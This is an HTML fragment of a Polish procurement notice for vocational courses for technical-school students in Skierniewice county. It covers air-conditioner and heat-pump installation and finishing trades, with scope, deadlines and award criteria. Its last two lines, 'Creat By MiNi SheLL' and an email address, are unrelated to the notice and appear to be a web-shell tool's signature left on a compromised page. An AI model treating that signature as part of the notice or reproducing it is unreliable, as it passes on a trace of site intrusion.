<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie Wykonawców w realizacji prowadzenia kursów na rzecz młodzieży - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Kurs montażu klimatyzatorów, pomp ciepła i systemów solarnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs montażu klimatyzatorów, pomp ciepła i systemów solarnych ( 12 godzin przy czym 1 godz.= 45 min zajęć i 20 min przerwy) dla : 11 osób w 2012 r.;  możliwość przeprowadzenia kursu w 2013 r. po ponownej rekrutacji uczestników ).
Uczestnikami/uczestniczkami kursu, do których zaplanowano ww. działanie są uczniowie klas technikum w wieku 18 - 19 lat, zamieszkujący w powiecie skierniewickim i na terenie woj. łódzkiego, chcący podnieść swoje umiejętności poprzez nabycie nowych kwalifikacji.  Program szkolenia powinien obejmować zajęcia teoretyczne i praktyczne. Program powinien zawierać treści szkolenia w zakresie: klimatyzatory : SANYO, DAIKIN, FUITSU, Samsung, Acson ;  substancje kontrolowane, czynniki chłodnicze, klimatyzacja, luty i lutowanie twarde, rury i kształtki stosowane w chłodnictwie; ćwiczenia montażowe ; wykonywanie połączeń instalacji poprzez lutowanie twarde.
Wykonawca winien zapewnić każdemu uczestnikowi wszelkie materiały szkoleniowe oraz  materiał  związany z przeprowadzeniem zajęć w części teoretycznej i praktycznej.
Po wyborze najkorzystniejszej oferty Wykonawca, którego oferta została uznana za najkorzystniejszą w porozumieniu z Zamawiającym przedkłada wstępny harmonogram realizacji zadania mieszczący się w przedziale czasowym podanym w zał. nr 1..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie Wykonawców w realizacji prowadzenia kursów na rzecz młodzieży - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Kurs technologii prac wykończeniowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs technologii prac wykończeniowych (16 godzin przy czym 1 godz. = 45 min zajęć i 20 min. przerwy) dla : 20 osób ( 1 gr. po 10 os. w 2012  i  1 gr.  w 2013 r. ).  Uczestnikami/uczestniczkami kursu do których zaplanowano ww. działanie są uczniowie klas technikum w wieku 18 - 19 lat, zamieszkujący w powiecie skierniewickim i na terenie woj. łódzkiego, chcący podnieść swoje umiejętności poprzez nabycie nowych kwalifikacji. Osoby biorące udział w kursie/szkoleniu posiadają wiedzę na poziomie średnim z zakresu obsługi komputera. Program szkolenia powinien obejmować zajęcia praktyczne w zakresie modułów tematycznych: 
a) glazurnik - posadzkarz ( materiałoznawstwo - rodzaje materiałów, maszyn i urządzeń do wykonywania prac przy układaniu glazury i terakoty; rysunek zawodowy wraz z kosztorysowaniem i wymiarowaniem powierzchni ścian i podłóg; opracowanie  własnego biznesplanu, kosztorysu i planu robót glazurniczych i posadzkarskich ),  
b) monter paneli i płyt kartonowo - gipsowych ( technologia i montaż konstrukcji drewnianych, aluminiowych i kartonowo - gipsowych, materiałoznawstwo i urządzenia do wykonywania prac przy montowaniu konstrukcji ścian z regipsów, ),  
c) murarz - tynkarz ( nowe techniki tynkarskie: Fibrotol, Poltex, Nidalit ; nowoczesne masy tynkarskie; plany robót murarsko- tynkarskich ).
Program kursu Wykonawca przedkłada wraz z ofertą z zał. nr 2. Program powinien zawierać wykaz godzin, zakres merytoryczny zajęć, ilość stanowisk niezbędnych do wykonania w/w prac. 
W trakcie kursu uczestnicy otrzymują bezpłatnie od Wykonawcy wszystkie niezbędne materiały szkoleniowe. Zamawiający dysponuje zapleczem lokalowo - technicznym do wykonania zleconej usługi.
Po wyborze najkorzystniejszej oferty Wykonawca, którego oferta została uznana za najkorzystniejszą w porozumieniu z Zamawiającym przedkłada wstępny harmonogram realizacji zadania mieszczący się w przedziale czasowym podanym w zał. nr 1. Po zakończeniu kursu Wykonawca wyda stosowne zaświadczenia / certyfikaty każdemu uczestnikowi. Wykonawca zadania zobowiąże się do przeprowadzenia testu ewaluacyjnego przed rozpoczęciem wykonywania usługi, w trakcie trwania kursu/ szkolenia  i na zakończenie oraz ankiety ewaluacyjnej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie Wykonawców w realizacji prowadzenia kursów na rzecz młodzieży - 40</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com